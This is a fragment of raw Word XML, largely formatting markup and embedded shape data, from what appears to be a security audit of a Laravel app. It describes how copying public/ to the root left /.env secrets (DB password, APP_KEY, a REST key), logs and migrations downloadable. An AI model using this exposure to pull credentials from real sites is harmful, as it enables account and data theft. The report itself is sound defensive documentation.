      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> were copied from </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public/</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the repository root so the app would run with the document root at the project root. The copy was verbatim, carrying no access rules and because the front-controller rewrite only fires for paths that do </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> exist </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>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RewriteCond</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> %{REQUEST_FILENAME</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>} !f</w:t>
      </w:r>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 every file that </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>does</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> exist was served as-is: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/.env</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (DB password, </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>APP_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">KEY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OneSignal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> REST key), </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>composer.lock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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
    <w:p w14:paraId="544F85F4" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="001244A6" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="166" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="43"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/storage/logs/laravel.log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/database/migrations/</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/app/*</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1244A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>APP_KEY</w:t>
      </w:r>
      <w:r w:rsidRPr="001244A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> alone signs and encrypts every Laravel cookie and signed URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D2BDF5" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="005C54CB" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="173" w:line="259" w:lineRule="auto"/>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Runtime logs committed</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the repository, and downloadable per (2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CE0B16" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="005C54CB" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="59"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Two endpoints additionally returned 500 on </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>every</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> call, which is what made (1) trivially reachable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8C35D8" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="005C54CB" w:rsidRDefault="00CA733A" w:rsidP="00CA733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8640" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2E615EEF" wp14:editId="6883B4DD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>18157</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-17791</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1743075" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="28776" name="Group 28776"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1743075" cy="304800"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1743075" cy="304800"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1498" name="Shape 1498"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1743075" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1743075" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1733550" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1736180" y="0"/>
                                  <a:pt x="1738425" y="930"/>
                                  <a:pt x="1740285" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1742145" y="4638"/>
                                  <a:pt x="1743075" y="6890"/>
                                  <a:pt x="1743075" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1743075" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1743075" y="126448"/>
                                  <a:pt x="1742145" y="128687"/>
                                  <a:pt x="1740285" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1738425" y="132407"/>
                                  <a:pt x="1736180" y="133338"/>
                                  <a:pt x="1733550" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133338"/>
                                  <a:pt x="4650" y="132407"/>
                                  <a:pt x="2790" y="130547"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="123825"/>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07" name="Shape 1507"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="657225" y="171450"/>
                            <a:ext cx="400050" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="400050" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="390525" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="393155" y="0"/>
                                  <a:pt x="395400" y="930"/>
                                  <a:pt x="397260" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="399120" y="4638"/>
                                  <a:pt x="400050" y="6890"/>
                                  <a:pt x="400050" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="400050" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="400050" y="126454"/>
                                  <a:pt x="399120" y="128699"/>
                                  <a:pt x="397260" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="395400" y="132420"/>
                                  <a:pt x="393155" y="133350"/>
                                  <a:pt x="390525"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76A9E6B" id="Group 28776" o:spid="_x0000_s1026" style="position:absolute;margin-left:1.45pt;margin-top:-1.4pt;width:137.25pt;height:24pt;z-index:-251427840" coordsize="17430,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&#10;BADzAAAAsgcAAAAA&#10;">
                <v:shape id="Shape 1498" o:spid="_x0000_s1027" style="position:absolute;width:17430;height:1333;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="17430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ihsyQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;EIXvQv/DMkIvpW4sRdroKlJr8aBIbRG9DdkxSc3OptltTP9951DwNsN78943k1nnKtVSE0rPBoaD&#10;BBRx5m3JuYHPj+X9E6gQkS1WnsnALwWYTW96E0ytv/A7tbuYKwnhkKKBIsY61TpkBTkMA18Ti3by&#10;jcMoa5Nr2+BFwl2lH5JkpB2WLA0F1vRSUHbe/TgD7WFz1w2Py/n3aP+2WKzP9vVrG4257XfzMahI&#10;Xbya/69XVvAfnwVXvpER9PQPAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAA&#10;AAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAV&#10;AQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA1IIobMkAAADd&#10;AAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAP0CAAAA&#10;AA==&#10;" path="m9525,l1733550,v2630,,4875,930,6735,2778c1742145,4638,1743075,6890,1743075,9525r,114300c1743075,126448,1742145,128687,1740285,130547v-1860,1860,-4105,2791,-6735,2803l9525,133350v-2630,-12,-4875,-943,-6735,-2803l,123825,,9525,2790,2778c4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1743075,133350"/>
                </v:shape>
                <v:shape id="Shape 1507" o:spid="_x0000_s1028" style="position:absolute;left:6572;top:1714;width:4000;height:1334;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="4000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HOwgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/bisIw&#10;EH1f8B/CCL5pqqCr1SiysKggLF7A17EZ22IzqU1su3+/EYR9m8O5zmLVmkLUVLncsoLhIAJBnFid&#10;c6rgfPruT0E4j6yxsEwKfsnBatn5WGCsbcMHqo8+FSGEXYwKMu/LWEqXZGTQDWxJHLibrQz6AKtU&#10;6gqbEG4KOYqiiTSYc2jIsKSvjJL78WkUXPfDx2N2wYk3PyOJqWzqza5Rqtdt13MQnlr/L367tzrM&#10;H0ef8PomnCCXfwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCfqSHOwgAAAN0AAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m9525,l390525,v2630,,4875,930,6735,2778c399120,4638,400050,6890,400050,9525r,114300c400050,126454,399120,128699,397260,130559v-1860,1861,-4105,2791,-6735,2791l9525,133350v-2630,,-4875,-930,-6735,-2791c930,128699,,126454,,123825l,9525c,6890,930,4638,2790,2778,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,40005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89664" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1FBE6B69" wp14:editId="672B6EEA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5056881</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-17791</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1095375" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="28781" name="Group 28781"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1095375" cy="133350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1095375" cy="133350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1504" name="Shape 1504"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1095375" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1095375" h="133350">
                                <a:moveTo>
                                  <a:pt x="9526" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1085850" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1088480" y="0"/>
                                  <a:pt x="1090725" y="930"/>
                                  <a:pt x="1092585" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1094444" y="4638"/>
                                  <a:pt x="1095375" y="6890"/>
                                  <a:pt x="1095375" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1095375" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1095375" y="126448"/>
                                  <a:pt x="1094444" y="128687"/>
                                  <a:pt x="1092585" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1090725" y="132407"/>
                                  <a:pt x="1088480" y="133338"/>
                                  <a:pt x="1085850" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9526" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133338"/>
                                  <a:pt x="4650" y="132407"/>
                                  <a:pt x="2790" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128687"/>
                                  <a:pt x="0" y="126448"/>
                                  <a:pt x="1" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6890"/>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188B3A0" id="Group 28781" o:spid="_x0000_s1026" style="position:absolute;margin-left:398.2pt;margin-top:-1.4pt;width:86.25pt;height:10.5pt;z-index:-251426816" coordsize="10953,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&#10;">
